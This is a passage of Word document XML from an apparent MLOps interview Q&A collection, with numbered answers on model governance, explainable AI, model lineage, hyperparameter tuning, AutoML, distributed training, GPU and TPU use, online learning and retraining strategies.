        <w:t xml:space="preserve">      * ONNX</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hugging Face models</w:t>
        <w:br/>
        <w:t>Key features include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time model serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Serverless autoscaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GPU support</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Canary deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A/B testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * REST and gRPC APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Inference graph pipelines</w:t>
        <w:br/>
        <w:t>In MLOps, KServe is commonly used for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scalable inference services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes-based ML deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dynamic autoscaling based on traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Multi-model serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Production-grade model management</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>A deployed model can automatically scale down to zero when there is no traffic and scale up instantly when prediction requests arrive.</w:t>
        <w:br/>
        <w:t>KServe integrates well with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grafana</w:t>
        <w:br/>
        <w:t>It is widely used for cloud-native, scalable, and production-ready ML model serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1654. Explain model governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model governance is the process of managing, controlling, and monitoring machine learning models throughout their lifecycle to ensure they are reliable, secure, compliant, and auditable.</w:t>
        <w:br/>
        <w:t>It helps organizations maintain transparency and control over how models are developed, deployed, and used in production.</w:t>
        <w:br/>
        <w:t>Model governance typically includes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Approval workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Access control and security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Audit trails</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Compliance tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and drift management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Documentation and reproducibility</w:t>
        <w:br/>
        <w:t>In production MLOps systems, governance is important because ML models can directly impact business decisions, customer experience, and regulatory compliance.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Before promoting a model to production, organizations may require:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accuracy validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bias and fairness checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security reviews</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Business approval</w:t>
        <w:br/>
        <w:t>Governance also helps with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollback management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Risk reduction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accountability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Regulatory compliance</w:t>
        <w:br/>
        <w:t>Common tools used for governance include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Weights &amp; Biases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cloud model registries and monitoring platforms</w:t>
        <w:br/>
        <w:t>Overall, model governance ensures ML systems remain trustworthy, controlled, and production-ready at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1655. What is explainable AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Explainable AI (XAI) is the practice of making machine learning model predictions understandable and interpretable for humans.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps explain how and why a model made a particular prediction or decision.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Explainable AI is important because many advanced ML models, especially deep learning models, behave like black boxes where the internal decision-making process is difficult to understand.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>XAI helps improve:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Transparency</w:t>
        <w:br/>
        <w:t>* Trust in ML systems</w:t>
        <w:br/>
        <w:t>* Debugging and troubleshooting</w:t>
        <w:br/>
        <w:t>* Regulatory compliance</w:t>
        <w:br/>
        <w:t>* Bias and fairness detection</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In a loan approval system, explainable AI can show which features, such as income, credit score, or loan history, influenced the prediction.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common explainability techniques include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Feature importance</w:t>
        <w:br/>
        <w:t>* SHAP values</w:t>
        <w:br/>
        <w:t>* LIME</w:t>
        <w:br/>
        <w:t>* Partial dependence plots</w:t>
        <w:br/>
        <w:t>* Attention visualization</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, explainability is important for monitoring, governance, auditing, and ensuring responsible AI practices in production systems.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* SHAP￼</w:t>
        <w:br/>
        <w:t>* LIME￼</w:t>
        <w:br/>
        <w:t>* Fiddler AI￼</w:t>
        <w:br/>
        <w:t>* WhyLabs￼</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1656. What is model lineage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model lineage is the process of tracking the complete history and lifecycle of a machine learning model from data collection to production deployment.</w:t>
        <w:br/>
        <w:t>It provides end-to-end traceability of all components involved in building and deploying a model.</w:t>
        <w:br/>
        <w:t>Model lineage typically tracks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Source datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature engineering steps</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Training code versions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hyperparameters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Experiment details</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model versions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployment history</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pipeline executions</w:t>
        <w:br/>
        <w:t>In MLOps, model lineage is important for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reproducibility</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Auditing and compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Debugging production issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Governance and accountability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollback and impact analysis</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>If a production model starts failing, lineage helps identify:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Which dataset was used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Which code version trained the model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Which pipeline generated it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * When it was deployed</w:t>
        <w:br/>
        <w:t>Common tools supporting model lineage include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Atlas</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * DataHub</w:t>
        <w:br/>
        <w:t>Model lineage is a critical part of enterprise-grade MLOps and AI governance systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1657. Explain feature importance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature importance is a technique used to measure how much each input feature contributes to a machine learning model’s predictions.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps identify which features have the most influence on the model’s decision-making process.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In a loan approval model, features like income, credit score, and repayment history may have higher importance compared to less relevant features.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Feature importance is useful for:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Understanding model behavior</w:t>
        <w:br/>
        <w:t>* Explainable AI</w:t>
        <w:br/>
        <w:t>* Feature selection</w:t>
        <w:br/>
        <w:t>* Debugging models</w:t>
        <w:br/>
        <w:t>* Reducing model complexity</w:t>
        <w:br/>
        <w:t>* Detecting biased or irrelevant features</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Different ML algorithms calculate feature importance differently:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Tree-based models use split importance</w:t>
        <w:br/>
        <w:t>* Linear models use coefficient weights</w:t>
        <w:br/>
        <w:t>* Advanced methods use SHAP or permutation importance</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common feature importance techniques include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Built-in tree feature importance</w:t>
        <w:br/>
        <w:t>* Permutation importance</w:t>
        <w:br/>
        <w:t>* SHAP values</w:t>
        <w:br/>
        <w:t>* LIME explanations</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Tools commonly used:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* SHAP￼</w:t>
        <w:br/>
        <w:t>* LIME￼</w:t>
        <w:br/>
        <w:t>* Scikit-learn￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps and Explainable AI, feature importance helps improve transparency, trust, and model interpretability in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1658. What is hyperparameter tuning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hyperparameter tuning is the process of selecting the best set of hyperparameters for a machine learning model to improve its performance.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Hyperparameters are configuration values set before training that control how the model learns.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Examples of hyperparameters include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Learning rate</w:t>
        <w:br/>
        <w:t>* Batch size</w:t>
        <w:br/>
        <w:t>* Number of trees</w:t>
        <w:br/>
        <w:t>* Number of epochs</w:t>
        <w:br/>
        <w:t>* Regularization parameters</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The goal of hyperparameter tuning is to find the optimal combination that gives the best evaluation metrics such as accuracy, F1-score, or RMSE.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common hyperparameter tuning techniques include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Grid Search</w:t>
        <w:br/>
        <w:t>* Random Search</w:t>
        <w:br/>
        <w:t>* Bayesian Optimization</w:t>
        <w:br/>
        <w:t>* Hyperband</w:t>
        <w:br/>
        <w:t>* Evolutionary optimization</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production MLOps systems, tuning is usually automated using distributed training and orchestration pipelines.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools used include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Optuna￼</w:t>
        <w:br/>
        <w:t>* Ray Tune￼</w:t>
        <w:br/>
        <w:t>* Kubeflow Katib￼</w:t>
        <w:br/>
        <w:t>* Hyperopt￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Hyperparameter tuning is important because proper tuning can significantly improve model accuracy, generalization, and overall production performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1659. What is AutoML?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AutoML stands for Automated Machine Learning. It is a process that automates the end-to-end tasks involved in building machine learning models, such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Data preprocessing</w:t>
        <w:br/>
        <w:t>* Feature engineering</w:t>
        <w:br/>
        <w:t>* Model selection</w:t>
        <w:br/>
        <w:t>* Hyperparameter tuning</w:t>
        <w:br/>
        <w:t>* Model evaluation</w:t>
        <w:br/>
        <w:t>* Deployment (in some platforms)</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The main goal of AutoML is to reduce manual effort and help teams build optimized ML models faster, even with limited data science expertise.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>For example, instead of manually trying algorithms like Random Forest, XGBoost, or Neural Networks one by one, AutoML automatically tests multiple models and configurations to identify the best-performing model based on evaluation metrics.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common AutoML tools and platforms include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Google Cloud AutoML / Vertex AI</w:t>
        <w:br/>
        <w:t>* H2O.ai AutoML</w:t>
        <w:br/>
        <w:t>* Microsoft Azure AutoML</w:t>
        <w:br/>
        <w:t>* DataRobot</w:t>
        <w:br/>
        <w:t>* Amazon Web Services SageMaker Autopilot</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>From a DevOps/MLOps perspective, AutoML helps accelerate experimentation and integrates well with CI/CD and pipeline automation for faster model delivery. However, experienced engineers still need to handle areas like data quality, governance, explainability, monitoring, and production optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1660. Explain distributed training.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Distributed training is a machine learning technique where model training is spread across multiple machines, GPUs, or nodes instead of running on a single system. It is mainly used to reduce training time and handle very large datasets or deep learning models.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In distributed training, the workload is divided in two common ways:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Data Parallelism</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * The dataset is split across multiple GPUs/nodes.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Each worker trains the same model on different portions of data.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Gradients are synchronized after each iteration.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Most commonly used approach.</w:t>
        <w:br/>
        <w:t>2. Model Parallelism</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * The model itself is divided across multiple devices.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Useful when the model is too large to fit into a single GPU memory.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components involved:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Worker nodes</w:t>
        <w:br/>
        <w:t>* Parameter servers or all-reduce communication</w:t>
        <w:br/>
        <w:t>* GPU/TPU clusters</w:t>
        <w:br/>
        <w:t>* High-speed networking</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular frameworks supporting distributed training include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* TensorFlow</w:t>
        <w:br/>
        <w:t>* PyTorch</w:t>
        <w:br/>
        <w:t>* Horovod</w:t>
        <w:br/>
        <w:t>* DeepSpeed</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In cloud and MLOps environments, distributed training is commonly implemented using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Kubernetes</w:t>
        <w:br/>
        <w:t>* Amazon Web Services SageMaker</w:t>
        <w:br/>
        <w:t>* Google Cloud Vertex AI</w:t>
        <w:br/>
        <w:t>* Microsoft Azure ML</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The main benefits are:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Faster training time</w:t>
        <w:br/>
        <w:t>* Scalability for large datasets</w:t>
        <w:br/>
        <w:t>* Ability to train very large AI models efficiently</w:t>
        <w:br/>
        <w:t>* Better resource utilization in cloud environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1661. What is GPU scheduling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GPU scheduling is the process of efficiently allocating and managing GPU resources among multiple applications, users, containers, or machine learning workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It ensures that GPU resources are utilized optimally without conflicts, especially in shared environments like Kubernetes clusters, AI platforms, or multi-tenant cloud infrastructures.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>GPU scheduling is important because GPUs are expensive and limited resources, so organizations need proper resource allocation for training, inference, and high-performance computing workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common GPU scheduling approaches include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Exclusive Scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">    One workload gets full access to the GPU.</w:t>
        <w:br/>
        <w:t>* Time-sharing</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Multiple workloads share GPU resources based on time slices.</w:t>
        <w:br/>
        <w:t>* Partitioning / MIG (Multi-Instance GPU)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    A single GPU is divided into isolated GPU instances for multiple users or applications.</w:t>
        <w:br/>
        <w:t>* Priority-based Scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Critical workloads are given higher GPU priority.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In Kubernetes environments, GPU scheduling is commonly managed using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Kubernetes Device Plugins</w:t>
        <w:br/>
        <w:t>* NVIDIA GPU Operator</w:t>
        <w:br/>
        <w:t>* Node labeling and taints/tolerations</w:t>
        <w:br/>
        <w:t>* Resource quotas and schedulers</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular technologies involved are:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* NVIDIA CUDA</w:t>
        <w:br/>
        <w:t>* Kubernetes</w:t>
        <w:br/>
        <w:t>* Slurm</w:t>
        <w:br/>
        <w:t>* Apache YARN</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>From an MLOps and DevOps perspective, GPU scheduling helps improve:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Resource utilization</w:t>
        <w:br/>
        <w:t>* Workload balancing</w:t>
        <w:br/>
        <w:t>* Cost optimization</w:t>
        <w:br/>
        <w:t>* Scalability of AI/ML infrastructure</w:t>
        <w:br/>
        <w:t>* Multi-user workload management in cloud and on-prem environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1662. Explain TPU usage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: TPU (Tensor Processing Unit) is a specialized hardware accelerator developed by Google Cloud for accelerating machine learning and deep learning workloads, especially large-scale neural network training and inference.</w:t>
        <w:br/>
        <w:t>TPUs are optimized for tensor operations and matrix computations, which are heavily used in AI models such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large Language Models (LLMs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Computer Vision</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NLP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation Systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Generative AI</w:t>
        <w:br/>
        <w:t>Compared to CPUs and GPUs, TPUs provide:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster training performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High parallel processing capability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lower training time for large models</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better power efficiency for AI workloads</w:t>
        <w:br/>
        <w:t>TPUs are commonly used with frameworks like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * JAX</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PyTorch (via XLA support)</w:t>
        <w:br/>
        <w:t>Common TPU use cases include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed deep learning training</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hyperparameter tuning at scale</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Training transformer-based models</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High-performance AI research</w:t>
        <w:br/>
        <w:t>In cloud environments, TPUs are mainly available through:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Google Cloud Vertex AI and TPU VM</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, TPUs help organizations reduce model training time and improve scalability for enterprise AI workloads. However, TPU adoption also requires optimized code, compatible frameworks, and efficient distributed training strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1663. What is online learning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Online learning in machine learning is a training approach where the model learns continuously from incoming data in real time or in small batches, instead of being trained once on a complete dataset.</w:t>
        <w:br/>
        <w:t>In this approach, data is processed sequentially, and the model updates its parameters incrementally as new data arrives. This is useful in dynamic environments where data changes frequently.</w:t>
        <w:br/>
        <w:t>Common use cases of online learning include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stock market prediction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time analytics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IoT and sensor data processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Spam filtering</w:t>
        <w:br/>
        <w:t>Key advantages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports real-time model updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles continuously growing datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduces retraining cost</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Adapts quickly to changing patterns (concept drift)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Efficient for streaming data environments</w:t>
        <w:br/>
        <w:t>Challenges include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Risk of model drift</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handling noisy data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous monitoring requirements</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintaining model stability and accuracy</w:t>
        <w:br/>
        <w:t>Popular frameworks and tools used for online learning are:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Spark Streaming</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * River</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PyTorch</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, online learning requires strong monitoring, automated pipelines, feature streaming, and continuous model validation to ensure reliable production performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1664. Explain retraining strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Retraining strategies are methods used to update machine learning models with new data to maintain accuracy, performance, and relevance over time.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>As production data changes due to data drift or concept drift, models can become less effective, so retraining is required to keep predictions reliable.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common retraining strategies include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Scheduled Retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Models are retrained at fixed intervals such as daily, weekly, or monthly.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Simple and commonly used in production environments.</w:t>
        <w:br/>
        <w:t>2. Trigger-based Retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Retraining starts automatically when performance drops below a threshold.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Triggered by drift detection, accuracy degradation, or monitoring alerts.</w:t>
        <w:br/>
        <w:t>3. Incremental / Online Retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Model continuously learns from new incoming data without full retraining.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Useful for real-time systems and streaming applications.</w:t>
        <w:br/>
        <w:t>4. Full Retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Entire model is retrained using old and new datasets together.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Provides better consistency but requires more compute resources.</w:t>
        <w:br/>
        <w:t>5. Rolling Window Retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Uses only recent data for retraining.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Helps adapt to changing business patterns and removes outdated data influence.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important considerations during retraining:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
